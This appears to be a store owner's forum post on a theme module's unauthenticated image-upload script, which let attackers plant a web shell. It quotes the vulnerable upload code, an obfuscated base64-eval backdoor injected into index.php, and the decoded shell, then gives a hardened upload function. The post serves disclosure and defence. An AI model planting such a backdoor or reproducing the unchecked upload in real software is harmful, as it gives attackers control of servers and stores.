
TiaNex Shopping


It's very possible the web shell file was uploaded from some modules of the supershop theme.

I also installed the kuteshop theme.

Unluckily, the hacker deleted all my website files.

We can be nearly sure the backdoor PHP file used to get a web shell was uploaded from

 \modules\verticalmegamenus\VerticalMegaMenusUploadImage.php

The code has a serious security problem:

it doesn't verify the file types or audit permissions at all.

I bought this theme, but it ruined my store!

 

<?php
require_once(dirname(__FILE__).'../../../config/config.inc.php');
require_once(dirname(__FILE__).'../../../init.php');
require_once(dirname(__FILE__).'/verticalmegamenus.php');
$tempPath = _PS_MODULE_DIR_.'verticalmegamenus/images/temps/';
$fileName = $_FILES["uploadimage"]["name"];
$pathFile = $tempPath.$fileName;
if(($_FILES["uploadimage"]["size"] > 1000000)){
	echo "File size is greater than 1MB";
}else{
	if (@move_uploaded_file($_FILES['uploadimage']['tmp_name'], $pathFile)) {		
	  	echo $fileName; 
	}else {
		echo "File upload failed.";
	}	
}
?>

 

 

 

One of the web shell backdoor files:

index.php was modified with this code at the beginning of the file:

<?php if(isset($_GET["3x"])&&$_GET["3x"]=="3x"){
    $func="cr"."ea"."te_"."fun"."ction";
    $x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");
    $x("[base64 payload omitted]");
    exit;}?><?php

After decoding:

<?php

$files = @$_FILES["files"];
if ($files["name"] != '') {
    $fullpath = $_REQUEST["path"] . $files["name"];
    if (move_uploaded_file($files['tmp_name'], $fullpath)) {
        echo "<h1><a href='$fullpath'>Done! Open</a></h1>";
    }
}echo '<html><head><title>Upload files...</title></head><body><form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="UPload"></form></body></html>';
?>
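
A hardened form of the upload step in VerticalMegaMenusUploadImage.php quoted above, as an added example that is not from the original post or from the theme's code. The function name `store_menu_image`, the `$isAuthorisedEmployee` flag (computed by the caller from the shop's back-office session) and the image allow-list are assumptions.

```php
<?php
// Added example (not the module's code). Requires PHP 7+ and the fileinfo extension.

const MAX_UPLOAD_BYTES = 1000000;      // same 1 MB limit as the original script
const ALLOWED_IMAGE_TYPES = [          // detected MIME type => extension we assign
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

/**
 * Validate one entry of $_FILES and store it under a server-chosen name.
 * $isAuthorisedEmployee is an assumption: the caller must derive it from the
 * back-office session before calling, so anonymous requests never reach the
 * file-handling code.
 */
function store_menu_image(array $file, string $destDir, bool $isAuthorisedEmployee): string
{
    if (!$isAuthorisedEmployee) {
        throw new RuntimeException('Not authorised');
    }
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('File upload failed.');
    }
    if ($file['size'] > MAX_UPLOAD_BYTES) {
        throw new RuntimeException('File size is greater than 1MB');
    }

    // Decide the type from the file's bytes, never from the client-supplied
    // name or Content-Type header.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    $ext  = is_string($mime) ? (ALLOWED_IMAGE_TYPES[$mime] ?? null) : null;
    if ($ext === null || @getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('Only JPEG, PNG or GIF images are accepted');
    }

    // Server-generated name with an extension we chose: $file['name'], which
    // the original script used verbatim, is never part of the stored path.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], rtrim($destDir, '/') . '/' . $name)) {
        throw new RuntimeException('File upload failed.');
    }
    return $name;
}
```

A file that passes these checks can still carry embedded PHP, so the upload directory should also be configured so the web server never executes scripts from it.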

 
